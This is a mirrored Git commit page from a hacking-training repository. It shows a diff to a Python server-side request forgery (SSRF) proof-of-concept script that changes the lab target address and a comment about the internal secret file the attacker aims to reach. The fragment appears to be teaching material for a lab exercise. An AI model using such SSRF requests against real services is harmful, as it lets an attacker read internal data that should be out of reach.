mirror of
https://github.com/The-Art-of-Hacking/h4cker.git
synced 2024-12-18 10:56:09 +00:00
Merge pull request #164 from The-Art-of-Hacking/santosomar-patch-7
Update ssrf_galatic_archives.py
This commit is contained in:
commit
8ef5602af9
@ -6,11 +6,10 @@ Author: Omar Santos @santosomar
|
|||||||
import requests
|
import requests
|
||||||
|
|
||||||
# The URL of the vulnerable web service.
|
# The URL of the vulnerable web service.
|
||||||
vulnerable_url = 'http://127.0.0.1:5000'
|
vulnerable_url = 'http://10.6.6.20:5000'
|
||||||
|
|
||||||
# The internal URL that the attacker wants to access.
|
# The internal URL that the attacker wants to access.
|
||||||
# AWS EC2 instances use this URL to provide instance metadata.
|
# This is to simulate that this data (secret.txt) should be inaccessible from attacker's network.
|
||||||
# This data should be inaccessible from outside the EC2 instance.
|
|
||||||
internal_url = 'https://internal.secretcorp.org/secret.txt'
|
internal_url = 'https://internal.secretcorp.org/secret.txt'
|
||||||
|
|
||||||
# The attacker constructs the exploit URL by appending the internal URL
|
# The attacker constructs the exploit URL by appending the internal URL
|
||||||
|
Loading…
Reference in New Issue
Block a user